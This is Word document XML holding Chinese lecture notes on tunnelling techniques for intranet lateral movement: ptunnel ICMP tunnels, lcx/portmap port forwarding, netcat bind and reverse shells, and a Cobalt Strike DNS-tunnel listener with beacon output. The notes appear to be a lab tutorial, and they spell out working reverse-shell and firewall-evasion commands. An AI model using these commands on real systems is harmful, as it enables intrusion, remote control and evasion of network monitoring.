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Bdr>
          <w:bottom w:val="doubleWave" w:color="000000" w:sz="8" w:space="1"/>
          <w:between w:val="doubleWave" w:color="000000" w:sz="8" w:space="1"/>
        </w:pBdr>
        <w:snapToGrid w:val="false"/>
        <w:spacing w:before="60" w:after="60" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r/>
    </w:p>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FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>内网安全-域横向网络&amp;传输&amp;应用层隧道技术</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="doubleWave" w:color="000000" w:sz="8" w:space="1"/>
          <w:between w:val="doubleWave" w:color="000000" w:sz="8" w:space="1"/>
        </w:pBdr>
        <w:snapToGrid w:val="false"/>
        <w:spacing w:before="60" w:after="60" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2563098" cy="896366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563098" cy="8963660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>必备</w:t>
      </w:r>
      <w:r>
        <w:t>知识点：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>1.代理和隧道技术区别?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>2.隧道技术为了解决什么?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>3.隧道技术前期的必备条件？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>在数据通信被拦截的情况下利用隧道技术封装改变通信协议进行绕过拦截</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>CS、MSF无法上线，数据传输不稳定无回显，出口数据被监控，网络通信存在问题等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>    在实际的网络中，通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况，如果发现异样，就会对通信进行阻断。那么什么是隧道呢？这里的隧道，就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装，然后穿过防火墙，与对方进行通信。当封装的数据包到达目的地时，将数据包还原，并将还原后的数据包发送到相应服务器上。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>常用的隧道技术有以下三种：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>    网络层：IPv6 隧道、ICMP 隧道</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>    传输层：TCP 隧道、UDP 隧道、常规端口转发</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>    应用层：SSH 隧道、HTTP/S 隧道、DNS 隧道</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="000000" w:sz="8" w:space="1"/>
          <w:between w:val="single" w:color="000000" w:sz="8" w:space="1"/>
        </w:pBdr>
        <w:snapToGrid w:val="false"/>
        <w:spacing w:before="60" w:after="60" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:snapToGrid w:val="false"/>
        <w:spacing w:before="60" w:after="60" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:fill="FFFF00"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>演示案例：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:snapToGrid w:val="false"/>
        <w:spacing w:before="60" w:after="60" w:line="312"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网络传输应用层检测连通性-检测</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:snapToGrid w:val="false"/>
        <w:spacing w:before="60" w:after="60" w:line="312"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网络层ICMP隧道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tunnel使用-检测,利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:snapToGrid w:val="false"/>
        <w:spacing w:before="60" w:after="60" w:line="312"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传输层转发隧道Portmap使用-检测,利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:snapToGrid w:val="false"/>
        <w:spacing w:before="60" w:after="60" w:line="312"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传输层转发隧道Netcat使用-检测,利用,功能</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:snapToGrid w:val="false"/>
        <w:spacing w:before="60" w:after="60" w:line="312"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应用层DNS隧道配合CS上线-检测,利用,说明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030282"/>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2030282"/>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FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:fill="ffffff"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5760720" cy="3092334"/>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3092334"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>#案例1-网络传输应用层检测连通性-检测</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>1. TCP 协议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>用“瑞士军刀”——netcat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>执行 nc 命令：nc &lt;IP&gt; &lt;端口&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>2. HTTP 协议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>用“curl”工具，执行curl &lt;IP地址:端口&gt;命令。如果远程主机开启了相应的端口，且内网可连接外网的话，就会输出相应的端口信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>3. ICMP 协议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>用“ping”命令，执行ping &lt;IP地址/域名&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>4. DNS 协议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>检测DNS连通性常用的命令是“nslookup”和“dig”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>nslookup 是windows自带的DNS探测命令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>dig是linux系统自带的DNS探测命令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>#案例2-网络层ICMP隧道</w:t>
      </w:r>
      <w:r>
        <w:t>ptunnel使用-检测,利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>kali2020-Target2-Target3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>pingtunnel是把tcp/udp/sock5流量伪装成icmp流量进行转发的工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>-p  ##表示连接icmp隧道另一端的机器IP（即目标服务器）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>-lp ##表示需要监听的本地tcp端口</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>-da ##指定需要转发的机器的IP（即目标内网某一机器的内网IP）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>-dp ##指定需要转发的机器的端口（即目标内网某一机器的内网端口）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>-x  ##设置连接的密码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Webserver：./ptunnel -x xiaodi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Hacker xiaodi：./ptunnel -p 192.168.76.150 -lp 1080 -da 192.168.33.33 -dp 3389 -x xiaodi #转发的3389请求数据给本地1080</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Hacker xiaodi：rdesktop 127.0.0.1 1080</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>老版本介绍：</w:t>
      </w:r>
      <w:r>
        <w:t>https://github.com/f1vefour/ptunnel(需自行编译)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>新版本介绍</w:t>
      </w:r>
      <w:r>
        <w:t>：https://github.com/esrrhs/pingtunnel(二次开发版)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>#案例3-传输层转发隧道Portmap使用-检测,利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>windows: lcx </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>linux：portmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>lcx -slave 攻击IP 3131 127.0.0.1 3389 //将本地3389给攻击IP的3131</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>lcx -listen 3131 3333 //监听3131转发至3333</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>#案例</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>-传输层转发隧道Netcat使用-检测,利用,功能</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Kali2020-god\webserver-god\sqlserver|dc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>1.双向连接反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>正向：攻击连接受害</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>    受害：nc -ldp 1234 -e /bin/sh                      //linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>         nc -ldp 1234 -e c:\windows\system32\cmd.exe  //windows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>    攻击：nc 192.168.76.132 1234                       //主动连接</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>反向：受害连接攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>    攻击：nc -lvp 1234</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>    受害：nc 攻击主机IP 1234 -e /bin/sh       </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>         nc 攻击主机IP 1234 -e c:\windows\system32\cmd.exe      </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>2.多向连接反弹shell-配合转发</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>反向：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>god\Webserver：Lcx.exe -listen 2222 3333</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>god\Sqlserver：nc 192.168.3.31 2222 -e c:\windows\system32\cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>kali或本机：nc -v 192.168.76.143 3333</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>正向该怎么操作呢？实战中改怎么选择正向和反向？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>3.相关netcat主要功能测试</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>指纹服务：nc -nv 192.168.76.143</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>端口扫描：nc -v -z 192.168.76.143 1-100</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>端口监听：nc -lvp xxxx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>文件传输：nc -lp 1111 &gt;1.txt </w:t>
      </w:r>
      <w:r>
        <w:t>| </w:t>
      </w:r>
      <w:r>
        <w:t>nc -vn xx.xx.x.x 1111 &lt;1.txt -q 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>反弹Shell：见上</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>#案例5-应用层DNS隧道配合CS上线-检测,利用，说明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>当常见协议监听器被拦截时，可以换其他协议上线，其中dns协议上线基本通杀</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>1.云主机Teamserver配置端口53启用-udp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>2.买一个域名修改解析记录如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>A记录-&gt;cs主机名-&gt;CS服务器IP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>NS记录-&gt;ns1主机名-&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>上个A记录地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>NS记录-&gt;ns2主机名-&gt;上个A记录地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>3.配置DNS监听器内容如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>ns1.xiaodi8.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>ns2.xiaodi8.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>cs.xiaodi8.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>4.生成后门执行上线后启用命令：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>beacon&gt; checkin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>[*] Tasked beacon to checkin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>beacon&gt; mode dns-txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>[+] data channel set to DNS-TXT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>[+] host called home, sent: 8 bytes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>beacon&gt; shell whoami</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>[*] Tasked beacon to run: whoami</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>[+] host called home, sent: 53 bytes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>[+] received output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>xiaodi-pc\xiaodi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="000000" w:sz="8" w:space="1"/>
          <w:between w:val="single" w:color="000000" w:sz="8" w:space="1"/>
        </w:pBdr>
        <w:snapToGrid w:val="false"/>
        <w:spacing w:before="60" w:after="60" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:snapToGrid w:val="false"/>
        <w:spacing w:before="60" w:after="60" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:fill="FFFF00"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>涉及资源：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:snapToGrid w:val="false"/>
        <w:spacing w:before="60" w:after="60" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId12">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
            <w:color w:val="1e6fff"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/f1vefour/ptunnel</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:snapToGrid w:val="false"/>
        <w:spacing w:before="60" w:after="60" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
            <w:color w:val="1e6fff"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/esrrhs/pingtunnel</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:snapToGrid w:val="false"/>
        <w:spacing w:before="60" w:after="60" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId14">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
            <w:color w:val="1e6fff"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/MrAnonymous-1/lcx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:snapToGrid w:val="false"/>
        <w:spacing w:before="60" w:after="60" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId15">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
            <w:color w:val="1e6fff"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://pan.baidu.com/s/1Vh4ELTFvyBhv3Avzft1fCw</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>提取码：xiao</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="000000" w:sz="8" w:space="1"/>
          <w:between w:val="single" w:color="000000" w:sz="8" w:space="1"/>
        </w:pBdr>
        <w:snapToGrid w:val="false"/>
        <w:spacing w:before="60" w:after="60" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:fill="FFFF00"/>
        </w:rPr>
      </w:p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ode="External" Target="https://github.com/f1vefour/ptunnel" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId12"/><Relationship TargetMode="External" Target="https://github.com/esrrhs/pingtunnel" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId13"/><Relationship TargetMode="External" Target="https://github.com/MrAnonymous-1/lcx" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId14"/><Relationship TargetMode="External" Target="https://pan.baidu.com/s/1Vh4ELTFvyBhv3Avzft1fCw" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId1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